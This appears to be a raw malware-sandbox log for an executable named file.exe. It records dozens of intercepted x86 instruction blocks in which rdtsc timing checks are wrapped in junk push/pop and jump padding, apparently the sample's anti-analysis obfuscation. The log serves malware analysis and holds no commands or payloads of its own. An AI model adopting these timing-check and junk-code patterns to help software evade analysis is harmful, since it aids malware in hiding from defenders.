Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B09C8 second address: 51B0A68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007EFF112B4C20h 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 jmp 00007EFF112B4C1Eh 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b pop edx 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f movsx edx, cx 0x00000022 mov ax, 904Bh 0x00000026 popad 0x00000027 xchg eax, esi 0x00000028 pushad 0x00000029 mov bh, ch 0x0000002b pushfd 0x0000002c jmp 00007EFF112B4C29h 0x00000031 and al, 00000046h 0x00000034 jmp 00007EFF112B4C21h 0x00000039 popfd 0x0000003a popad 0x0000003b mov esi, dword ptr [ebp+08h] 0x0000003e jmp 00007EFF112B4C1Eh 0x00000043 sub ebx, ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007EFF112B4C23h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0A68 second address: 51B0A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0A6C second address: 51B0A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0A72 second address: 51B0A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0A78 second address: 51B0A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0A7C second address: 51B0A9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFF1080EDE4h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0A9E second address: 51B0AA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0AA4 second address: 51B0AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0AAA second address: 51B0AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0AAE second address: 51B0AB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0AB2 second address: 51B0AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007EFF8302A4EAh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edi, 608DB884h 0x00000016 call 00007EFF112B4C1Dh 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0AD7 second address: 51B0B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 4F332923h 0x00000008 call 00007EFF1080EDE8h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000018 jmp 00007EFF1080EDE1h 0x0000001d mov ecx, esi 0x0000001f pushad 0x00000020 mov ecx, 784C24F3h 0x00000025 mov dh, ch 0x00000027 popad 0x00000028 je 00007EFF8258465Bh 0x0000002e jmp 00007EFF1080EDDBh 0x00000033 test byte ptr [76FB6968h], 00000002h 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007EFF1080EDE5h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0B4D second address: 51B0B89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007EFF112B4C1Dh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007EFF8302A469h 0x00000014 jmp 00007EFF112B4C27h 0x00000019 mov edx, dword ptr [ebp+0Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0B89 second address: 51B0B8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0B8F second address: 51B0C49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007EFF112B4C1Eh 0x00000011 adc esi, 4EE81518h 0x00000017 jmp 00007EFF112B4C1Bh 0x0000001c popfd 0x0000001d movzx ecx, dx 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007EFF112B4C20h 0x00000029 or ecx, 1B13FF78h 0x0000002f jmp 00007EFF112B4C1Bh 0x00000034 popfd 0x00000035 pushfd 0x00000036 jmp 00007EFF112B4C28h 0x0000003b adc ecx, 28C499D8h 0x00000041 jmp 00007EFF112B4C1Bh 0x00000046 popfd 0x00000047 popad 0x00000048 xchg eax, ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007EFF112B4C1Bh 0x00000052 and esi, 72CF5C9Eh 0x00000058 jmp 00007EFF112B4C29h 0x0000005d popfd 0x0000005e movzx ecx, di 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0C49 second address: 51B0CB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007EFF1080EDE0h 0x0000000f push eax 0x00000010 jmp 00007EFF1080EDDBh 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007EFF1080EDE4h 0x0000001d adc si, 2028h 0x00000022 jmp 00007EFF1080EDDBh 0x00000027 popfd 0x00000028 mov esi, 04ED911Fh 0x0000002d popad 0x0000002e push dword ptr [ebp+14h] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007EFF1080EDE1h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51B0D55 second address: 51B0D7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, 612EBF75h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C0D82 second address: 51C0DD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007EFF1080EDE7h 0x00000014 or cl, FFFFFFCEh 0x00000017 jmp 00007EFF1080EDE9h 0x0000001c popfd 0x0000001d mov eax, 7F05D4D7h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C0DD9 second address: 51C0DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C0B86 second address: 51C0BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov bx, si 0x0000000d pushfd 0x0000000e jmp 00007EFF1080EDDEh 0x00000013 or ch, 00000048h 0x00000016 jmp 00007EFF1080EDDBh 0x0000001b popfd 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51C0BB2 second address: 51C0BDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 475826EAh 0x00000008 push edx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007EFF112B4C26h 0x00000017 pop esi 0x00000018 mov cx, di 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 524074F second address: 52407A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007EFF1080EDE1h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007EFF1080EDDEh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007EFF1080EDE7h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52407A8 second address: 52407AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52407AF second address: 52407EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007EFF1080EDE8h 0x00000011 and si, 82C8h 0x00000016 jmp 00007EFF1080EDDBh 0x0000001b popfd 0x0000001c mov esi, 7C8D103Fh 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52407EA second address: 52407F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52407F0 second address: 52407F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52407F4 second address: 52407F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5230A4F second address: 5230A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5230A55 second address: 5230A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51D01BB second address: 51D0216 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, 5402h 0x0000000a popad 0x0000000b push ebp 0x0000000c pushad 0x0000000d mov dh, al 0x0000000f call 00007EFF1080EDE1h 0x00000014 pushfd 0x00000015 jmp 00007EFF1080EDE0h 0x0000001a and ax, FAC8h 0x0000001f jmp 00007EFF1080EDDBh 0x00000024 popfd 0x00000025 pop ecx 0x00000026 popad 0x00000027 mov dword ptr [esp], ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007EFF1080EDE2h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5230C9F second address: 5230CD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007EFF112B4C28h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5230CD2 second address: 5230CD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5230CD6 second address: 5230CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5230CDC second address: 5230CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5230CE2 second address: 5230CE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5230D64 second address: 5230D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5230D68 second address: 5230D7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5230D7C second address: 5230D8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF1080EDDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5230D8E second address: 5230D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5230D92 second address: 5230DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx eax, al 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007EFF1080EDDDh 0x00000012 xor eax, 58FB76E6h 0x00000018 jmp 00007EFF1080EDE1h 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007EFF1080EDDEh 0x00000026 xor al, FFFFFF88h 0x00000029 jmp 00007EFF1080EDDBh 0x0000002e popfd 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1176886 second address: 117688A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0740 second address: 51E0788 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ebx, 5C2DC6AEh 0x00000011 popad 0x00000012 push FFFFFFFEh 0x00000014 jmp 00007EFF1080EDE5h 0x00000019 call 00007EFF1080EDD9h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov di, 340Eh 0x00000025 mov dl, 83h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0788 second address: 51E078E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E078E second address: 51E07CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007EFF1080EDE9h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E07CB second address: 51E07CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E07CF second address: 51E07E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E07E9 second address: 51E081C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c mov si, dx 0x0000000f push edi 0x00000010 mov edx, esi 0x00000012 pop eax 0x00000013 popad 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 mov esi, 632028D5h 0x0000001e mov ax, 7D51h 0x00000022 popad 0x00000023 pop eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov ax, dx 0x0000002a mov cl, bh 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E081C second address: 51E0850 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 6016D269h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFF1080EDE2h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0850 second address: 51E0858 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0858 second address: 51E088A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 16E67C69h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push esi 0x00000012 pop edx 0x00000013 pushfd 0x00000014 jmp 00007EFF1080EDDEh 0x00000019 sbb cl, FFFFFF98h 0x0000001c jmp 00007EFF1080EDDBh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E088A second address: 51E0913 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000000h] 0x0000000f pushad 0x00000010 pushad 0x00000011 mov dx, cx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 call 00007EFF112B4C24h 0x0000001c pushfd 0x0000001d jmp 00007EFF112B4C22h 0x00000022 xor ah, FFFFFF88h 0x00000025 jmp 00007EFF112B4C1Bh 0x0000002a popfd 0x0000002b pop ecx 0x0000002c popad 0x0000002d push ecx 0x0000002e jmp 00007EFF112B4C24h 0x00000033 mov dword ptr [esp], eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007EFF112B4C1Ah 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0913 second address: 51E0922 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0922 second address: 51E0928 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0928 second address: 51E092C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E092C second address: 51E093D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 1Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E093D second address: 51E0955 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0955 second address: 51E095F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 627E7B54h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E095F second address: 51E0972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d mov ebx, 2FE16184h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0972 second address: 51E0978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0978 second address: 51E097C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E097C second address: 51E098D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E098D second address: 51E0991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0991 second address: 51E09AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E09AE second address: 51E09B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E09B4 second address: 51E09EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007EFF112B4C22h 0x0000000f mov esi, 63275C61h 0x00000014 popad 0x00000015 mov dword ptr [esp], esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007EFF112B4C23h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E09EE second address: 51E0A3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 1115391Ah 0x00000008 pushfd 0x00000009 jmp 00007EFF1080EDDBh 0x0000000e add cl, FFFFFFBEh 0x00000011 jmp 00007EFF1080EDE9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, edi 0x0000001b jmp 00007EFF1080EDDEh 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov dl, al 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0A3A second address: 51E0A4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 mov dx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0A4B second address: 51E0A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0A53 second address: 51E0A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0A59 second address: 51E0A5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0A5D second address: 51E0A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [76FBB370h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0A70 second address: 51E0A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0A74 second address: 51E0A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0A78 second address: 51E0A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0A7E second address: 51E0A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0A84 second address: 51E0AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [ebp-08h], eax 0x0000000b pushad 0x0000000c movzx esi, di 0x0000000f movsx edi, ax 0x00000012 popad 0x00000013 xor eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007EFF1080EDDAh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0AA5 second address: 51E0ABB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0ABB second address: 51E0ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0ABF second address: 51E0AC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
